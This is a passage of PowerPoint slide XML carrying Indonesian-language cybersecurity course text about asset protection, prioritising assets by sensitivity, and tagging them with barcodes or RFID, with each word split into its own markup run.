            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peraturan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>relevan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhirnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</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152</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260039148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Konsep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aset</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dari </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perspektif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggambarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ancaman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Istilah "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>repositori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komponen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>banyak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perlindungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integritas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerahasiaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketersediaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Tim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>siber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertanggung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jawab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memprioritaskan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset-aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berdasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitivitasnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampaknya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> inti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dicuri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibobol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dampak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kehilangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerusakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Aset dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Konvensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Penamaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Standar</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Aset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berwujud</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> label barcode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> tag ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>frekuensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> radio (RFID) yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cukup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nomor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). Tag RFID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> chip yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diprogram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Saat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangkauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, chip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sinyal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
